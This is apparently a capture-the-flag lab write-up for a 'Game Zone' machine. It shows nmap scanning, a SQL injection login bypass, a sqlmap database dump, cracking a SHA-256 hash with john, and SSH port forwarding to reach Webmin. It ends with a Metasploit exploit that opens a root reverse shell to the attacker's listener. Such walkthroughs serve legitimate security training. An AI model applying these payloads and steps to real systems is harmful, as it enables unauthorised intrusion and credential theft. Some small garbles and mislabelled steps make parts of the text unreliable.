Game Zone
Learn to hack into this machine. Understand how to use SQLMap, crack some passwords, reveal services using a reverse SSH tunnel and escalate your privileges to root!
Scanning
nmap
root@ip-10-10-202-12:~# nmap -T4 -A 10.10.42.26
Starting Nmap 7.60 ( https://nmap.org ) at 2021-09-22 13:48 BST
Stats: 0:00:02 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 1.00% done; ETC: 13:50 (0:01:39 remaining)
Nmap scan report for ip-10-10-42-26.eu-west-1.compute.internal (10.10.42.26)
Host is up (0.00057s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 61:ea:89:f1:d4:a7:dc:a5:50:f7:6d:89:c3:af:0b:03 (RSA)
| 256 b3:7d:72:46:1e:d3:41:b6:6a:91:15:16:c9:4a:a5:fa (ECDSA)
|_ 256 53:67:09:dc:ff:fb:3a:3e:fb:fe:cf:d8:6d:41:27:ab (EdDSA)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Game Zone
MAC Address: 02:AE:D8:BA:8A:FD (Unknown)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3.13
OS details: Linux 3.13
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.57 ms ip-10-10-42-26.eu-west-1.compute.internal (10.10.42.26)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.96 seconds
Enumeration
port 80
login page ... lets go for SQLi
Initial Access
SQLi
Use ' or 1=1 -- - as your username and leave the password blank.
We in let's search for '
this form infected with SQLi lets break into database using SQLmap
backend running mysql
SQLMap
lets capture this request with burpsuite first
save it to text file
root@ip-10-10-202-12:~# cat req.txt
Host: 10.10.42.26
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
Origin: http://10.10.42.26
Connection: close
Referer: http://10.10.42.26/portal.php
Cookie: PHPSESSID=lkupl1irpcikelbq03vroe3ii5
Upgrade-Insecure-Requests: 1
searchitem=test" > req.txt# sqlmap -r req.txt --dbms=mysql --dump
# -r request
# --dbms tells SQLMap what type of database management system it is
# --dump attempts to outputs the entire database
root@ip-10-10-202-12:~# sqlmap -r req.txt --dbms=mysql --dump
___
__H__
___ ___["]_____ ___ ___ {1.2.4#stable}
|_ -| . [(] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
. . .
[SNIP]
. . .
+------------------------------------------------------------------+----------+
| pwd | username |
+------------------------------------------------------------------+----------+
| ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14 | agent47 |
+------------------------------------------------------------------+----------+
lets crack this one and connect using SSH
using john the ripper to crack this hash
root@ip-10-10-202-12:~# john hash --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA256
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA256 [SHA256 256/256 AVX2 8x])
Warning: poor OpenMP scalability for this hash type, consider --fork=2
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
videogamer124 (?)
1g 0:00:00:00 DONE (2021-09-22 14:13) 3.333g/s 9721Kp/s 9721Kc/s 9721KC/s vimivera..veluasan
Use the "--show --format=Raw-SHA256" options to display all of the cracked passwords reliably
Session completed. credentials agent47:videogamer124
SSH target with this credentials ...
Privilege Escalation
Enumerate Services
0.0.0.0 not routable accessed locally only
let's setup reverse ssh tunneling
root@ip-10-10-202-12:~# ssh -L 10000:localhost:10000 agent47@10.10.42.26
agent47@10.10.42.26's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-159-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
109 packages can be updated.
68 updates are security updates.
Last login: Wed Sep 22 08:16:05 2021 from 10.10.202.12
agent47@gamezone:~$ now we can access port 10000 on attacker machine
login with credentials agent47:videogamer124
root@ip-10-10-202-12:~# nmap -sV -p 10000 127.0.0.1
Starting Nmap 7.60 ( https://nmap.org ) at 2021-09-22 15:34 BST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000044s latency).
PORT STATE SERVICE VERSION
10000/tcp open http MiniServ 1.580 (Webmin httpd)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.62 secondsversion MiniServ 1.580
Metasploit
$ msfconsole -q
msf5 > search CVE-2012-2982
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/webmin_show_cgi_exec 2012-09-06 excellent Yes Webmin /file/show.cgi Remote Command ExecutionLet’s select it and set a reverse shell for our payload:
msf5 > use 0
msf5 exploit(unix/webapp/webmin_show_cgi_exec) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf5 exploit(unix/webapp/webmin_show_cgi_exec) > show options
Module options (exploit/unix/webapp/webmin_show_cgi_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD yes Webmin Password
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 10000 yes The target port (TCP)
SSL true yes Use SSL
USERNAME yes Webmin Username
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Webmin 1.580Now, let’s set up our variables:
msf5 exploit(unix/webapp/webmin_show_cgi_exec) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf5 exploit(unix/webapp/webmin_show_cgi_exec) > set ssl false
[!] Changing the SSL option's value may require changing RPORT!
ssl => false
msf5 exploit(unix/webapp/webmin_show_cgi_exec) > set rpot 10000
rpot => 10000
msf5 exploit(unix/webapp/webmin_show_cgi_exec) > set username agent47
username => agent47
msf5 exploit(unix/webapp/webmin_show_cgi_exec) > set password videogamer124
password => videogamer124
msf5 exploit(unix/webapp/webmin_show_cgi_exec) > set lhost 10.8.50.72
lhost => 10.8.50.72We are all set. Let’s exploit.
msf5 exploit(unix/webapp/webmin_show_cgi_exec) > exploit
[*] Started reverse TCP double handler on 10.8.50.72:4444
[*] Attempting to login...
[+] Authentication successfully
[+] Authentication successfully
[*] Attempting to execute the payload...
[+] Payload executed successfully
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo wwkNQ0H13ZRfhiYE;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "wwkNQ0H13ZRfhiYE\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (10.8.50.72:4444 -> 10.10.60.68:32784) at 2020-06-08 19:59:09 +0200
pwd
/usr/share/webmin/file/
whoami
rootLast updated
